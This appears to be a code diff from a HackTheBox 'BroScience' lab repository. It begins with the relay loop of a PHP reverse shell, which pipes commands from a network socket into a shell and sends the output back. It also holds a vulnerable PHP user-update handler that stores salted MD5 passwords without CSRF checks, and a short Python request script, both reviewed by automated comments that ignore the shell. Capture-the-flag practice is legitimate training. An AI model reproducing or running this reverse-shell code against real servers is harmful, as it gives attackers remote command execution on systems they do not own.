while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>


@@ -0,0 +1,84 @@
<?php
session_start();
// Check if user is not logged in
if (!isset($_SESSION['id'])) {
header('Location: /login.php');
echo "Not logged in";
die();
}
// Check that all parameters are filled out
if (!isset($_POST['id']) || !isset($_POST['username']) || !isset($_POST['email']) || !isset($_POST['password'])) {
header('Location: /index.php');
echo "Missing parameters";
die();
}
// Check that parameters are not empty
if (empty($_POST['id'])) {
header('Location: /index.php');
echo "Empty parameters";
die();
}
// Check that we have permissions
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "is_admin_query", 'SELECT is_admin::int FROM users WHERE id = $1');
$res = pg_execute($db_conn, "is_admin_query", array($_SESSION['id']));
$row = pg_fetch_row($res);
$_SESSION['is_admin'] = $row[0]; // Update value since we can
if ($_SESSION['id'] !== $_POST['id'] && !(bool)$row[0]) {
header("Location: /user.php?id={$_POST['id']}");
echo "Missing permissions";
die();
}
// Update the user
if (!empty($_POST['username'])) {
if (strlen($_POST['username']) <= 100) {
// Ensure username is unique
$res = pg_prepare($db_conn, "check_username_query", 'SELECT id FROM users WHERE username = $1');
$res = pg_execute($db_conn, "check_username_query", array($_POST['username']));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "update_user_username_query", 'UPDATE users SET username = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_username_query", array($_POST['username'], $_POST['id']));
// Update session username if we are logged in as this user
if ($_SESSION['id'] === $_POST['id']) {
$_SESSION['username'] = $_POST['username'];
}
} else {
echo "Skipping username which already exists\n";
}
} else {
echo "Skipped invalid username\n";
}
}
if (!empty($_POST['email'])) {
if (filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
// Ensure email is unique
$res = pg_prepare($db_conn, "check_email_query", 'SELECT id FROM users WHERE email = $1');
$res = pg_execute($db_conn, "check_email_query", array($_POST['email']));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "update_user_email_query", 'UPDATE users SET email = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_email_query", array($_POST['email'], $_POST['id']));
} else {
echo "Skipping email which already exists\n";
}
} else {
echo "Skipped invalid email\n";
}
}
if (!empty($_POST['password'])) {
$res = pg_prepare($db_conn, "update_user_password_query", 'UPDATE users SET password = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_password_query", array(md5($db_salt . $_POST['password']), $_POST['id']));
}
header("Location: /user.php?id={$_POST['id']}");
echo "User updated";
?>
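Review bot: The password branch at the end of this file stores `md5($db_salt . $_POST['password'])`, a single fast MD5 round with one shared salt (`$db_salt` is presumably defined in `includes/db_connect.php`), so a leaked `users` table is cheap to brute-force offline. Store `password_hash($_POST['password'], PASSWORD_DEFAULT)` instead and have the login path check it with `password_verify()`, rehashing existing rows on the next successful login. The same branch changes the password without asking for the current one, and nothing in the handler verifies a CSRF token before the `UPDATE` statements run. Self-service changes should require the current password, and every POST should be checked against a per-session token before any row is modified.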


@@ -0,0 +1,8 @@
import requests
def getUser(id):
r = requests.get(f"https://broscience.htb/user.php?id={id}", verify=False)
return r
if __name__ == '__main__':
getUser(1)
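Review bot: `requests.get(..., verify=False)` in `getUser` turns off TLS certificate validation, so the script accepts whatever certificate is presented for broscience.htb, and the call has no `timeout`, so it can hang indefinitely on an unresponsive host. If the lab host uses a self-signed certificate, trust that certificate explicitly rather than disabling the check: `requests.get(url, verify="<path-to-exported-cert.pem>", timeout=10)`. A one-line docstring on `getUser` saying that it returns the raw `requests.Response` would also help, since the `__main__` block currently discards the result.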

BIN
HTB/broscience/write.ul Normal file

Binary file not shown.